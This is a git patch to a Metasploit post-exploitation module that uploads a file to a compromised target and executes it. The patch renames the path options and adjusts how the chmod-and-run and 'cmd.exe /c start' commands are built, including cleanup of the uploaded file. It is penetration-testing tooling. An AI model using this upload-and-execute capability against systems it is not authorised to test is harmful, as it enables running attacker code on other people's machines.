From 2cb4b97164b21b8cd976cc4f1ed4168640e98b11 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Mon, 30 Jul 2018 13:55:40 -0500
Subject: [PATCH] Land #10384, upload_exec fixes

---
 modules/post/multi/manage/upload_exec.rb | 35 +++++++++++++++---------
 1 file changed, 22 insertions(+), 13 deletions(-)

diff --git a/modules/post/multi/manage/upload_exec.rb b/modules/post/multi/manage/upload_exec.rb
index cd54f9fb08..5dedd2a8d2 100644
--- a/modules/post/multi/manage/upload_exec.rb
+++ b/modules/post/multi/manage/upload_exec.rb
@@ -18,34 +18,43 @@ class MetasploitModule < Msf::Post
 
     register_options(
       [
-        OptPath.new('LFILE', [true,'Local file to upload and execute']),
-        OptString.new('RFILE', [false,'Name of file on target (default is basename of LFILE)']),
+        OptPath.new('LPATH', [true,'Local file path to upload and execute']),
+        OptString.new('RPATH', [false,'Remote file path on target (default is basename of LPATH)']),
       ])
   end
 
-  def rfile
-    if datastore['RFILE'].blank?
-      remote_name = File.basename(datastore['LFILE'])
+  def rpath
+    if datastore['RPATH'].blank?
+      remote_name = File.basename(datastore['LPATH'])
     else
-      remote_name = datastore['RFILE']
+      remote_name = datastore['RPATH']
     end
 
     remote_name
   end
 
-  def lfile
-    datastore['LFILE']
+  def lpath
+    datastore['LPATH']
   end
 
   def run
-    upload_file(rfile, lfile)
+    upload_file(rpath, lpath)
 
     if session.platform.include?("windows")
-      cmd_exec("cmd.exe /c start #{rfile}", nil, 0)
+      cmd_exec("cmd.exe /c start #{rpath}", nil, 0)
     else
-      cmd_exec("chmod 755 #{rfile} && ./#{rfile}", nil, 0)
+      cmd = "chmod 700 #{rpath} && "
+
+      # Handle absolute paths
+      if rpath.start_with?('/')
+        cmd << rpath
+      else
+        cmd << "./#{rpath}"
+      end
+
+      cmd_exec(cmd, nil, 0)
     end
-    rm_f(rfile)
+
+    rm_f(rpath)
   end
 end
-